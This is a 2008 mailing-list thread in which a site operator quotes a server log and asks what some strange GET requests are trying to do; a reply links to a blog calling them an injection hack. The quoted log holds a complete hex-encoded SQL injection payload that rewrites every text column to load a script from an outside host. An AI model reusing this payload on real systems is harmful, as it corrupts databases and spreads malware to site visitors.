ontolog-forum
[Top] [All Lists]

Re: [ontolog-forum] Commands Sent to an FeaReferenceModelOntology

To: "[ontolog-forum]" <ontolog-forum@xxxxxxxxxxxxxxxx>
From: Jack Park <jack.park@xxxxxxx>
Date: Fri, 15 Aug 2008 10:48:25 -0700
Message-id: <48A5C169.8080101@xxxxxxx>
A quick google of a snippet of that query got this
http://web-robot-abuse.blogspot.com/2008/08/latest-hack-running-right-now-is.html
> The latest hack running right now is a injection atempt using a string like 
>this.
> 
> 
>DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);
> 
> Update hackers.txt file right now.    (01)

Not really certain what all that means.    (02)

Jack    (03)

Adrian Walker wrote:
> Hi All --
> 
> Your expert advice please.
> 
> On our website [1], we support a kind of Wiki for business rules and 
> facts, written in executable English. 
> 
> The site can also be used as an SOA endpoint.
> 
> One of the sets of rules and facts on the site is a version of the 
> FeaReferenceModelOntology.
> 
> We are seeing incoming GET commands like the one listed below.
> 
>  [15/Aug/2008:13:10:57 -0400] "GET 
> 
>/demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B65202727
25223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);    (04)

> HTTP/1.1" 200 620290
> 
> The commands originate from many different sites around the internet, 
> and we have not been able to find out why they are being sent.
> 
> Does anyone know please what these commands are trying to do?  Or are 
> they simply buffer overflow attack attempts?
> 
> Thanks for your kind thoughts about this, and apologies for cross posting.
> 
>                                                    -- Adrian
> 
> [1]  Internet Business Logic
> A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL 
> and RDF
> Online at www.reengineeringllc.com <http://www.reengineeringllc.com>    
> Shared use is free
> 
> Adrian Walker
> Reengineering
> 
> 
> ------------------------------------------------------------------------
> 
>  
> _________________________________________________________________
> Message Archives: http://ontolog.cim3.net/forum/ontolog-forum/  
> Subscribe/Config: http://ontolog.cim3.net/mailman/listinfo/ontolog-forum/  
> Unsubscribe: mailto:ontolog-forum-leave@xxxxxxxxxxxxxxxx
> Shared Files: http://ontolog.cim3.net/file/
> Community Wiki: http://ontolog.cim3.net/wiki/ 
> To Post: mailto:ontolog-forum@xxxxxxxxxxxxxxxx
>      (05)


_________________________________________________________________
Message Archives: http://ontolog.cim3.net/forum/ontolog-forum/  
Subscribe/Config: http://ontolog.cim3.net/mailman/listinfo/ontolog-forum/  
Unsubscribe: mailto:ontolog-forum-leave@xxxxxxxxxxxxxxxx
Shared Files: http://ontolog.cim3.net/file/
Community Wiki: http://ontolog.cim3.net/wiki/ 
To Post: mailto:ontolog-forum@xxxxxxxxxxxxxxxx    (06)

<Prev in Thread] Current Thread [Next in Thread>